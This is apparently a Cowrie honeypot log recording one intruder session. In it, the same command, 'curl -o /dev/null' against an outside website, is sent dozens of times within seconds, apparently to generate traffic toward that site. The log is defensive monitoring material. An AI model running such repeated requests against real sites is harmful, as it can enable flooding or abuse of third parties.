{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.365792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.403328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.404243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.441693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.442639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.479715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.480656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.519261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.520338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.558412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.559641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.596331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.597369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.634323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.635356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.682318Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.683362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.721893Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.722864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.758982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.759954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.805532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.806568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.843603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.844604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.882201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.883175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.919852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.920785Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.957255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.958229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.994458Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.995385Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.032768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.033849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.096828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.097835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.134972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.136175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.173971Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.175067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.211602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.212576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.249282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.250583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.287628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.288695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.354080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.355138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.391889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.393110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.429680Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.430636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.468414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.469439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.519395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.520443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.556895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.557994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.597394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.598417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.635228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.636250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.676221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.677280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.717821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.718910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.761628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.762737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.802445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.803548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.846641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.848491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.915008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.916082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:05.982866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:05.983979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.039891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.041186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.078920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.080141Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.119896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.121045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.160966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.162052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.199727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.200808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.238384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.239568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.280353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.281796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.322479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.323788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.361950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.363033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.410890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.412315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.454817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.455960Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.493160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.494320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.535945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.537362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.575028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.576151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.616508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.617634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.654865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.655938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.693674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.694640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.734309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.735519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.778583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.779721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.828712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.829737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.868189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.869202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.907463Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.908486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.947729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.948794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:06.986079Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:06.987412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.027163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.028291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.065162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.066386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.105649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
